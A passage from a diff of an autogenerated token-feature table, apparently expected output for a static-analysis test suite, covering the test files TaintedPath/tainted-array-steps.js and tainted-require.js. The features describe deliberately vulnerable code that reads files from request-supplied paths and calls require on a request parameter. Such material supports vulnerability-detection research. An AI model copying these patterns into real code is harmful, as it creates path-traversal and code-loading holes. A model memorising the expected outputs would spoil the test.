autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | exceptional return of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | return of anonymous function | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | CalleeFlexibleAccessPath | parts.map | | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | contextFunctionInterfaces | | @@ -10768,6 +84960,71 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | x => x.toLowerCase() | receiverName | parts | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:26 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:26 | x | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:26 | x | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:26 | x | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:26 | x | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:38 | x.toLowerCase | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:38 | x.toLowerCase | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:38 | x.toLowerCase | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:38 | x.toLowerCase | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:38 | x.toLowerCase | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | exceptional return of x.toLowerCase() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | exceptional return of x.toLowerCase() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | exceptional return of x.toLowerCase() | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | exceptional return of x.toLowerCase() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | exceptional return of x.toLowerCase() | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | x.toLowerCase() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | x.toLowerCase() | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | x.toLowerCase() | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | x.toLowerCase() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:26:13:40 | x.toLowerCase() | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:28:13:38 | toLowerCase | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:28:13:38 | toLowerCase | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:28:13:38 | toLowerCase | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:28:13:38 | toLowerCase | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:28:13:38 | toLowerCase | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:5 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:11 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | exceptional return of res.wri ... ('/'))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | exceptional return of res.wri ... ('/'))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | exceptional return of res.wri ... ('/'))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | exceptional return of res.wri ... ('/'))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | exceptional return of res.wri ... ('/'))) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | res.wri ... ('/'))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | res.wri ... ('/'))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | res.wri ... ('/'))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | res.wri ... ('/'))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:3:14:45 | res.wri ... ('/'))) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:7:14:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:7:14:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:7:14:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:7:14:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:7:14:11 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:14 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:14 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:27 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:27 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | exceptional return of fs.read ... n('/')) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | exceptional return of fs.read ... n('/')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | exceptional return of fs.read ... n('/')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | exceptional return of fs.read ... n('/')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | exceptional return of fs.read ... n('/')) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | contextFunctionInterfaces | | @@ -10776,6 +85033,26 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:13:14:44 | fs.read ... n('/')) | receiverName | res | +| autogenerated/TaintedPath/tainted-array-steps.js:14:16:14:27 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:16:14:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:16:14:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:16:14:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:16:14:27 | readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:33 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:33 | parts | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:33 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:33 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:33 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:38 | parts.join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:38 | parts.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:38 | parts.join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:38 | parts.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:38 | parts.join | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | exceptional return of parts.join('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | exceptional return of parts.join('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | exceptional return of parts.join('/') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | exceptional return of parts.join('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | exceptional return of parts.join('/') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | calleeImports | fs | @@ -10785,6 +85062,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:29:14:43 | parts.join('/') | receiverName | fs | +| autogenerated/TaintedPath/tainted-array-steps.js:14:35:14:38 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:14:35:14:38 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:14:35:14:38 | join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:14:35:14:38 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:14:35:14:38 | join | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | CalleeFlexibleAccessPath | parts.join | | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | contextFunctionInterfaces | | @@ -10793,12 +85075,92 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:14:40:14:42 | '/' | receiverName | parts | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:6 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:6 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:6 | server | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:13 | server.listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:13 | server.listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:13 | server.listen | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | exceptional return of server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | exceptional return of server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | exceptional return of server.listen() | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:1:17:15 | server.listen() | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:17:8:17:13 | listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:8:17:13 | listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:17:8:17:13 | listen | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:0 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:0 | this | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | __dirname | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | __dirname | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | require | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:1:1:1 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:11 | express | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:5:1:32 | express ... press') | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:21 | require | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | exceptional return of require('express') | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:1:15:1:32 | require('express') | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-require.js:1:23:1:31 | 'express' | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:7 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:7 | app | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:5:3:19 | app = express() | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:17 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:17 | express | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | exceptional return of express() | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:3:11:3:19 | express() | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:3 | app | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:7 | app.get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:1:5:7 | app.get | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | app.get ... "));\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | app.get ... "));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | app.get ... "));\\n}) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | exceptional return of app.get ... "));\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | exceptional return of app.get ... "));\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:1:8:2 | exceptional return of app.get ... "));\\n}) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:5:5:7 | get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:5:5:7 | get | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | calleeImports | express | @@ -10806,6 +85168,26 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:5:9:5:20 | '/some/path' | receiverName | app | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | require | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | require | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | require | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | this | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:23:5:22 | this | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | 'arguments' object of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | exceptional return of anonymous function | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | exceptional return of anonymous function | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | calleeImports | express | @@ -10813,6 +85195,66 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | functio ... e"));\\n} | receiverName | app | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | return of anonymous function | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:23:8:1 | return of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | contextSurroundingFunctionParameters | | +| 